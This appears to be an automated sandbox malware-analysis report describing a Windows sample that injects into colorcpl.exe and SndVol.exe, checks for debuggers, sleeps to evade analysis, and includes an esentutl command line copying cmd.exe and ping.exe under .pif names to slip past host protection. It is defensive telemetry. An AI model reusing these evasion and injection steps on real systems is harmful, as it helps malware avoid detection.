Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CF7E2 Sleep,ExitProcess,	8_2_027CF7E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CF7E2 Sleep,ExitProcess,	11_2_027CF7E2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280F7E2 Sleep,ExitProcess,	13_2_0280F7E2

Contains functionality to enumerate running services

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	8_2_027DA7D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	11_2_027DA7D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	13_2_0281A7D9

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 5281			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 4709			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\esentutl.exe

Dropped PE file which has not been started: C:\Users\Public\xpha.pif

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 9.8 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 6.2 %
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	API coverage: 9.8 %
Source: C:\Windows\SysWOW64\SndVol.exe	API coverage: 5.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep count: 5281 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep time: -15843000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep count: 4709 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep time: -14127000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029C5908
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	8_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	8_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C7877 FindFirstFileW,FindNextFileW,	8_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	8_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_0280E8F9 FindFirstFileExA,	8_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_027CBD72
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C7877 FindFirstFileW,FindNextFileW,	11_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0280E8F9 FindFirstFileExA,	11_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_027CBD72
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_0280928E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_0280C388
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_0281C322
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_028096A0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02819B86 FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_02819B86
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0284E8F9 FindFirstFileExA,	13_2_0284E8F9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02808847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_02808847
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02807877 FindFirstFileW,FindNextFileW,	13_2_02807877
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_0280BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C7CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_027C7CD2

Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000076D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, Vjrsafyh.PIF, 0000000A.00000002.2240432486.00000000005FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Vjrsafyh.PIF, 0000000C.00000002.2323126754.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_029DF744

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_027F4A8A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_029D894C

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A8A8E5 mov eax, dword ptr fs:[00000030h]	0_2_02A8A8E5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_02803355 mov eax, dword ptr fs:[00000030h]	8_2_02803355
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_02803355 mov eax, dword ptr fs:[00000030h]	11_2_02803355
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02843355 mov eax, dword ptr fs:[00000030h]	13_2_02843355

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027D20B2 GetProcessHeap,HeapFree,

8_2_027D20B2

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_027F503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_027F4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_027FBB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F4BD8 SetUnhandledExceptionFilter,	8_2_027F4BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_027F503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_027F4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_027FBB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F4BD8 SetUnhandledExceptionFilter,	11_2_027F4BD8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0283503C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02834A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_02834A8A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02834BD8 SetUnhandledExceptionFilter,	13_2_02834BD8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0283BB71

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 27C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 27C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2800000 protect: page execute and read and write	Jump to behavior

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe

Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	8_2_027D2132
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	11_2_027D2132
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	13_2_02812132

Contains functionality to simulate mouse events

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027D9662 mouse_event,

8_2_027D9662

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior

Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager+
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_02A7C246 cpuid

0_2_02A7C246

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C5ACC
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: GetLocaleInfoA,	0_2_029CA7C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: GetLocaleInfoA,	0_2_029CA810
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C5BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	8_2_027CF90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	8_2_02812393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_028120B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_0281201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_02812143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_02812690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_02808484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_028124BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	8_2_028125C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	8_2_0280896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_02811FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_02811D58
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_02812393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_028120B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_0281201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_02812143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_02812690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_02808484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_028124BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_028125C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	11_2_027CF90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_0280896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_02811FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_02811D58
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_029A5ACC
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_029A5BD7
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: GetLocaleInfoA,	12_2_029AA810
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	13_2_02852393
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_028520B6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_0285201B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_02852143
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_02852690
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_02848484
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_028524BC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	13_2_028525C3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	13_2_0280F90C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	13_2_0284896D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_02851FD0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_02851D58

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029C920C GetLocalTime,

0_2_029C920C

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DB69E GetComputerNameExW,GetUserNameW,

8_2_027DB69E

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_02809210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_02809210

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029CB78C GetVersionExA,

0_2_029CB78C

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

